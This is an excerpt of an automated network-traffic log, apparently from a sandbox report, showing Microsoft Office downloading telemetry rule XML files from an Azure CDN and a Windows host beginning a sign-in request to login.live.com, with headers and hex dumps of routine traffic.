                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_BAY
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 99fef3da-65ad-4ba9-83c4-5c9a26cc9c64
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: PH1PEPF00011F1A V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:40 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 1918
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                122192.168.2.54989913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:40 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1395
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: cd04a713-f01e-003f-7315-26d19d000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210240Z-16849878b78p8hrf1se7fucxk800000006dg00000000f1pg
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                123192.168.2.54990013.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:40 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1358
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 3a0fb8a5-701e-0050-6930-276767000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210240Z-16849878b78qfbkc5yywmsbg0c000000056g00000000k1ug
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                124192.168.2.54990113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:40 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1395
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: eb17c832-b01e-0097-1249-274f33000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210240Z-16849878b78hh85qc40uyr8sc800000005t000000000qd2r
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:40 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                125192.168.2.54990213.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:41 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1358
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 255ed8c5-301e-0051-461c-2738bb000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210241Z-16849878b7898p5f6vryaqvp5800000006ag00000000r2vw
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                126192.168.2.54990313.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:41 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1389
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: cdbfd92d-501e-0029-317f-27d0b8000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210241Z-16849878b78sx229w7g7at4nkg00000003v000000000918u
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                127192.168.2.54990413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:41 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1352
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 75b99f9f-001e-0079-56b6-2612e8000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210241Z-r197bdfb6b4qbfppwgs4nqza80000000046g000000008m02
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                128192.168.2.54990513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:41 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1405
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 4e087ea8-e01e-0099-0e5a-28da8a000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210241Z-15b8d89586ff5l62aha9080wv000000006rg00000000re92
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:41 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                129192.168.2.54990620.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
